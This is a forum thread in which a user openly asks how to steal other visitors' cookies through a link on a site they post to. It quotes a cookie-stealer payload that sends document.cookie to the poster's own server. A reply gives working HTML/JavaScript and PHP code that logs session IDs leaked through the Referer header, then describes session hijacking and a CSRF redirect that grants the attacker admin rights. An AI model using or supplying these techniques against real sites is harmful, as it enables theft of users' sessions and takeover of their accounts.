Referrer cookies?

Hey guys

Heres a scenario I was thinking about:

I put a link on my blog to a php file on my personal web space. Is it possible to retrieve the persons cookies from my blog using the php file? For example, say the user's cookie from my blog is called "Cookie A". Is there a way to get "Cookie A" to the php file without using Javascript? i.e. using just a regular link like:

http://www.personalblog.com/test.php

The link can include parameters, i.e.

http://www.personalblog.com/test.php?paramter1=1

but is there anyway of retrieving cookies without using Javascript?

If not, are there any tutorials, or is it even possible to, insert Javascript to an image file?

Thanks very much for your time!

It'd help to know how setcookie(); actually works. Meaning, learn the path&domain values explicitly to answer your question.

lol sorry, it has to be done WITHOUT using javascript. sorry.

Use the COOKIE Superglobal

if i understand your question correctly, you want your cookie stealer to be fed the cookies from site A to your stealer on site B. Commonly we would use document.cookie, but you do not wish to use javascript.

If you have access to use php on this other site, your blog, you can formulate the link using php to interface with the cookies. however, since you cannot use javascript, i assume that you do not have this type of access. therefore you cannot use php.

so in answer to your question, no i dont believe so. someone correct me if im wrong tho

see, the site allows me to create links, but for teh cookie stealer the code needed is:

javascript:void(window.location="http://www.mysite.com/stealer.php?data="+document.cookie);

but the site strips the javascript bit and only makes the http://www.mysite.com/stealer.php?data= a link.

the pages are .jsp if that helps. thanks very much for your help.

Where? Is there bbcode in which you can inject this? Tell us more about how it works and perhaps we can get you a different way to utilize what you have.

It is possible to be able to read their session cookies is certain criteria are met. Some sites place the session id variable in the url as part of the querystring. If this is the case and you had an image to your (remote) site on that page then the session ID would get sent along as part of the referrer in the request to load the image.

Want to test this? Create ref.html file as follows:

<script type="text/javascript">
function addImg()
{
	i = document.createElement('img')
	i.style.display = 'none'
	i.src = 'log.php' //the url to the php script which reads the referrer
	document.body.appendChild(i)
}
</script>
Shove something in the URL after a question mark, then click to create an image, then check out log.txt in this folder
<input type="button" value="create an image" onclick="addImg()" />
</html>```

The create log.php as such:
```markup
<?php
$filename = 'log.txt';
$handle = fopen($filename, 'a');
$needle = substr($_SERVER['HTTP_REFERER'],strpos($_SERVER['HTTP_REFERER'],'?'));
fwrite($handle,$needle);
fwrite($handle,"\n");
fclose($handle);
// $needle is the querystring (including the ?)
?> ```
Finally create log.txt and make it writeable. Now load up ref.html?foo=bar and hit the button then check out log.txt.
You'll see that it logged the querystring of the request to the log file.

In an attack scenario once you have the session you could do several things. In most cases you'd try to hijack their session. If the site ties session IDs to IP or does something else to prevent that you can still perform CSRF. You could return a 302 header and redirect the user to example.com/admin/make_admin.php?user_id=42
The browser of the person on the site would then try to load your image and get redirected to the url I gave above. This means **they** are sending the request to make you an admin, which is a valid request (if the site is stupid enough to make that CSRF work).

So, can you steal cookies without client side scripting? Not really no, can you steal the session ID without access to cookies? Rarely, but in some cases yes.